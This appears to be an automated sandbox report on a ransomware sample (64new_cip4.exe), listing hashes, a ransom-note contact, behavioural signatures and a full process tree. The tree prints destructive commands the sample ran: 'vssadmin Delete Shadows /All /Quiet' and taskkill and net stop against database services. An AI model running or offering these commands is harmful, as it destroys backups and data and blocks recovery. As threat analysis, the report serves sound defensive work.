Analysis
-
max time kernel
135s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
29-11-2022 11:01
Static task
static1
Behavioral task
behavioral1
Sample
64new_cip4.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
64new_cip4.exe
Resource
win10v2004-20221111-en
General
-
Target
64new_cip4.exe
-
Size
309KB
-
MD5
0b69c52d88d2c047bf176d59b2f9ce4c
-
SHA1
43a770e0f2fe02b606f37c29d8dd81d57ce233b8
-
SHA256
4e388c10feaa2c897a5c7816eb899b314b4a5cd4342d9a1a5f1800623153e890
-
SHA512
7514371f10bbaf9e7db698347741ae66770d4ed1a2ad43fbb8f86d0ee13e54d652fd16b7410462e040cbeda19a7224af4431207dc0a197102ba00553639c4f72
-
SSDEEP
6144:vPLavV9JccWJzcwYuUxhCKrSjZ5pjedRYc4ihyYr+3l0I3WtCyaw7c:v+vV9CZMuUxhC6SjZfjeu++3oaw7c
Malware Config
Extracted
\??\A:\!-Recovery_Instructions-!.html
<h2>Mikesupp77@outlook.com</h2>
https://tox.chat/download.html</p>
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
64new_cip4.exedescription pid process target process PID 1044 created 1212 1044 64new_cip4.exe Explorer.EXE -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
64new_cip4.exedescription ioc process File renamed C:\Users\Admin\Pictures\ConvertFromDismount.png => C:\Users\Admin\Pictures\ConvertFromDismount.png.cipher4 64new_cip4.exe File renamed C:\Users\Admin\Pictures\InvokeImport.tif => C:\Users\Admin\Pictures\InvokeImport.tif.cipher4 64new_cip4.exe File renamed C:\Users\Admin\Pictures\LimitCompress.tif => C:\Users\Admin\Pictures\LimitCompress.tif.cipher4 64new_cip4.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
64new_cip4.exedescription ioc process File opened (read-only) \??\I: 64new_cip4.exe File opened (read-only) \??\J: 64new_cip4.exe File opened (read-only) \??\L: 64new_cip4.exe File opened (read-only) \??\M: 64new_cip4.exe File opened (read-only) \??\S: 64new_cip4.exe File opened (read-only) \??\T: 64new_cip4.exe File opened (read-only) \??\F: 64new_cip4.exe File opened (read-only) \??\G: 64new_cip4.exe File opened (read-only) \??\V: 64new_cip4.exe File opened (read-only) \??\X: 64new_cip4.exe File opened (read-only) \??\K: 64new_cip4.exe File opened (read-only) \??\R: 64new_cip4.exe File opened (read-only) \??\U: 64new_cip4.exe File opened (read-only) \??\Z: 64new_cip4.exe File opened (read-only) \??\A: 64new_cip4.exe File opened (read-only) \??\E: 64new_cip4.exe File opened (read-only) \??\H: 64new_cip4.exe File opened (read-only) \??\P: 64new_cip4.exe File opened (read-only) \??\O: 64new_cip4.exe File opened (read-only) \??\Q: 64new_cip4.exe File opened (read-only) \??\W: 64new_cip4.exe File opened (read-only) \??\Y: 64new_cip4.exe File opened (read-only) \??\B: 64new_cip4.exe File opened (read-only) \??\N: 64new_cip4.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2020 1212 WerFault.exe Explorer.EXE -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1716 vssadmin.exe -
Kills process with taskkill 16 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2008 taskkill.exe 1052 taskkill.exe 1796 taskkill.exe 276 taskkill.exe 1984 taskkill.exe 1832 taskkill.exe 2036 taskkill.exe 1412 taskkill.exe 1772 taskkill.exe 572 taskkill.exe 1036 taskkill.exe 1308 taskkill.exe 1888 taskkill.exe 1752 taskkill.exe 1480 taskkill.exe 848 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 60 IoCs
Processes:
64new_cip4.exepid process 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe 1044 64new_cip4.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exevssvc.exedescription pid process Token: SeDebugPrivilege 2008 taskkill.exe Token: SeDebugPrivilege 1752 taskkill.exe Token: SeDebugPrivilege 572 taskkill.exe Token: SeDebugPrivilege 1480 taskkill.exe Token: SeDebugPrivilege 276 taskkill.exe Token: SeDebugPrivilege 1984 taskkill.exe Token: SeDebugPrivilege 1832 taskkill.exe Token: SeDebugPrivilege 2036 taskkill.exe Token: SeDebugPrivilege 848 taskkill.exe Token: SeDebugPrivilege 1036 taskkill.exe Token: SeDebugPrivilege 1412 taskkill.exe Token: SeDebugPrivilege 1308 taskkill.exe Token: SeDebugPrivilege 1772 taskkill.exe Token: SeDebugPrivilege 1796 taskkill.exe Token: SeDebugPrivilege 1888 taskkill.exe Token: SeDebugPrivilege 1052 taskkill.exe Token: SeBackupPrivilege 320 vssvc.exe Token: SeRestorePrivilege 320 vssvc.exe Token: SeAuditPrivilege 320 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
64new_cip4.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1044 wrote to memory of 1304 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 1304 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 1304 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 1304 1044 64new_cip4.exe cmd.exe PID 1304 wrote to memory of 2040 1304 cmd.exe cmd.exe PID 1304 wrote to memory of 2040 1304 cmd.exe cmd.exe PID 1304 wrote to memory of 2040 1304 cmd.exe cmd.exe PID 1304 wrote to memory of 2040 1304 cmd.exe cmd.exe PID 1044 wrote to memory of 1096 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 1096 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 1096 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 1096 1044 64new_cip4.exe cmd.exe PID 1096 wrote to memory of 1052 1096 cmd.exe cmd.exe PID 1096 wrote to memory of 1052 1096 cmd.exe cmd.exe PID 1096 wrote to memory of 1052 1096 cmd.exe cmd.exe PID 1096 wrote to memory of 1052 1096 cmd.exe cmd.exe PID 1052 wrote to memory of 2008 1052 cmd.exe taskkill.exe PID 1052 wrote to memory of 2008 1052 cmd.exe taskkill.exe PID 1052 wrote to memory of 2008 1052 cmd.exe taskkill.exe PID 1044 wrote to memory of 2016 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 2016 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 2016 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 2016 1044 64new_cip4.exe cmd.exe PID 2016 wrote to memory of 1104 2016 cmd.exe cmd.exe PID 2016 wrote to memory of 1104 2016 cmd.exe cmd.exe PID 2016 wrote to memory of 1104 2016 cmd.exe cmd.exe PID 2016 wrote to memory of 1104 2016 cmd.exe cmd.exe PID 1104 wrote to memory of 1752 1104 cmd.exe taskkill.exe PID 1104 wrote to memory of 1752 1104 cmd.exe taskkill.exe PID 1104 wrote to memory of 1752 1104 cmd.exe taskkill.exe PID 1044 wrote to memory of 1952 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 1952 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 1952 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 1952 1044 64new_cip4.exe cmd.exe PID 1952 wrote to memory of 1092 1952 cmd.exe cmd.exe PID 1952 wrote to memory of 1092 1952 cmd.exe cmd.exe PID 1952 wrote to memory of 1092 1952 cmd.exe cmd.exe PID 1952 wrote to memory of 1092 1952 cmd.exe cmd.exe PID 1092 wrote to memory of 572 1092 cmd.exe taskkill.exe PID 1092 wrote to memory of 572 1092 cmd.exe taskkill.exe PID 1092 wrote to memory of 572 1092 cmd.exe taskkill.exe PID 1044 wrote to memory of 1992 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 1992 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 1992 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 1992 1044 64new_cip4.exe cmd.exe PID 1992 wrote to memory of 1140 1992 cmd.exe cmd.exe PID 1992 wrote to memory of 1140 1992 cmd.exe cmd.exe PID 1992 wrote to memory of 1140 1992 cmd.exe cmd.exe PID 1992 wrote to memory of 1140 1992 cmd.exe cmd.exe PID 1140 wrote to memory of 1480 1140 cmd.exe taskkill.exe PID 1140 wrote to memory of 1480 1140 cmd.exe taskkill.exe PID 1140 wrote to memory of 1480 1140 cmd.exe taskkill.exe PID 1044 wrote to memory of 1148 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 1148 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 1148 1044 64new_cip4.exe cmd.exe PID 1044 wrote to memory of 1148 1044 64new_cip4.exe cmd.exe PID 1148 wrote to memory of 772 1148 cmd.exe cmd.exe PID 1148 wrote to memory of 772 1148 cmd.exe cmd.exe PID 1148 wrote to memory of 772 1148 cmd.exe cmd.exe PID 1148 wrote to memory of 772 1148 cmd.exe cmd.exe PID 772 wrote to memory of 276 772 cmd.exe taskkill.exe PID 772 wrote to memory of 276 772 cmd.exe taskkill.exe PID 772 wrote to memory of 276 772 cmd.exe taskkill.exe PID 1044 wrote to memory of 1968 1044 64new_cip4.exe cmd.exe -
System policy modification 1 TTPs 4 IoCs
Processes:
64new_cip4.exe64new_cip4.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 64new_cip4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 64new_cip4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 64new_cip4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 64new_cip4.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\64new_cip4.exe"C:\Users\Admin\AppData\Local\Temp\64new_cip4.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Modifies extensions of user files
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c rem Kill "SQL"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlbrowser.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlwriter.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlservr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im msmdsrv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im MsDtsSrvr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlceip.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdlauncher.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im Ssms.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdhost.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdlauncher.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlservr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im ReportingServicesService.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im postgres.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im postgres.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im postgres.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper1003⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper1004⤵
-
C:\Windows\system32\net.exenet stop MSSQLServerADHelper1005⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1006⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ISARS6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$MSFW5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$MSFW6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ISARS6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$MSFW5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$MSFW6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLBrowser4⤵
-
C:\Windows\system32\net.exenet stop SQLBrowser5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop ReportServer$ISARS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop ReportServer$ISARS4⤵
-
C:\Windows\system32\net.exenet stop ReportServer$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$ISARS6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLWriter4⤵
-
C:\Windows\system32\net.exenet stop SQLWriter5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet4⤵
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
-
C:\Users\Admin\AppData\Local\Temp\64new_cip4.exe\\?\C:\Users\Admin\AppData\Local\Temp\64new_cip4.exe -network2⤵
- System policy modification
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1212 -s 30802⤵
- Program crash
-
C:\Windows\system32\taskkill.exetaskkill -f -im SQLAGENT.EXE1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill -f -im msftesql.exe1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill -f -im pg_ctl.exe1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/276-71-0x0000000000000000-mapping.dmp
-
memory/320-115-0x0000000000000000-mapping.dmp
-
memory/364-111-0x0000000000000000-mapping.dmp
-
memory/572-65-0x0000000000000000-mapping.dmp
-
memory/588-109-0x0000000000000000-mapping.dmp
-
memory/592-91-0x0000000000000000-mapping.dmp
-
memory/632-84-0x0000000000000000-mapping.dmp
-
memory/772-70-0x0000000000000000-mapping.dmp
-
memory/848-83-0x0000000000000000-mapping.dmp
-
memory/928-75-0x0000000000000000-mapping.dmp
-
memory/988-100-0x0000000000000000-mapping.dmp
-
memory/1000-76-0x0000000000000000-mapping.dmp
-
memory/1036-110-0x0000000000000000-mapping.dmp
-
memory/1036-86-0x0000000000000000-mapping.dmp
-
memory/1044-54-0x0000000075601000-0x0000000075603000-memory.dmpFilesize
8KB
-
memory/1052-58-0x0000000000000000-mapping.dmp
-
memory/1052-104-0x0000000000000000-mapping.dmp
-
memory/1056-93-0x0000000000000000-mapping.dmp
-
memory/1088-87-0x0000000000000000-mapping.dmp
-
memory/1092-64-0x0000000000000000-mapping.dmp
-
memory/1096-57-0x0000000000000000-mapping.dmp
-
memory/1104-61-0x0000000000000000-mapping.dmp
-
memory/1104-107-0x0000000000000000-mapping.dmp
-
memory/1108-117-0x0000000000000000-mapping.dmp
-
memory/1140-67-0x0000000000000000-mapping.dmp
-
memory/1148-69-0x0000000000000000-mapping.dmp
-
memory/1192-82-0x0000000000000000-mapping.dmp
-
memory/1208-112-0x0000000000000000-mapping.dmp
-
memory/1304-79-0x0000000000000000-mapping.dmp
-
memory/1304-55-0x0000000000000000-mapping.dmp
-
memory/1308-92-0x0000000000000000-mapping.dmp
-
memory/1380-94-0x0000000000000000-mapping.dmp
-
memory/1384-90-0x0000000000000000-mapping.dmp
-
memory/1412-89-0x0000000000000000-mapping.dmp
-
memory/1480-68-0x0000000000000000-mapping.dmp
-
memory/1504-108-0x0000000000000000-mapping.dmp
-
memory/1616-99-0x0000000000000000-mapping.dmp
-
memory/1644-96-0x0000000000000000-mapping.dmp
-
memory/1672-88-0x0000000000000000-mapping.dmp
-
memory/1672-114-0x0000000000000000-mapping.dmp
-
memory/1716-85-0x0000000000000000-mapping.dmp
-
memory/1752-62-0x0000000000000000-mapping.dmp
-
memory/1764-78-0x0000000000000000-mapping.dmp
-
memory/1764-103-0x0000000000000000-mapping.dmp
-
memory/1772-95-0x0000000000000000-mapping.dmp
-
memory/1796-98-0x0000000000000000-mapping.dmp
-
memory/1804-105-0x0000000000000000-mapping.dmp
-
memory/1824-113-0x0000000000000000-mapping.dmp
-
memory/1832-77-0x0000000000000000-mapping.dmp
-
memory/1876-116-0x0000000000000000-mapping.dmp
-
memory/1888-101-0x0000000000000000-mapping.dmp
-
memory/1952-63-0x0000000000000000-mapping.dmp
-
memory/1956-73-0x0000000000000000-mapping.dmp
-
memory/1968-72-0x0000000000000000-mapping.dmp
-
memory/1972-118-0x0000000000000000-mapping.dmp
-
memory/1976-97-0x0000000000000000-mapping.dmp
-
memory/1984-74-0x0000000000000000-mapping.dmp
-
memory/1992-66-0x0000000000000000-mapping.dmp
-
memory/2004-81-0x0000000000000000-mapping.dmp
-
memory/2004-106-0x0000000000000000-mapping.dmp
-
memory/2008-59-0x0000000000000000-mapping.dmp
-
memory/2016-60-0x0000000000000000-mapping.dmp
-
memory/2020-102-0x0000000000000000-mapping.dmp
-
memory/2036-80-0x0000000000000000-mapping.dmp
-
memory/2040-56-0x0000000000000000-mapping.dmp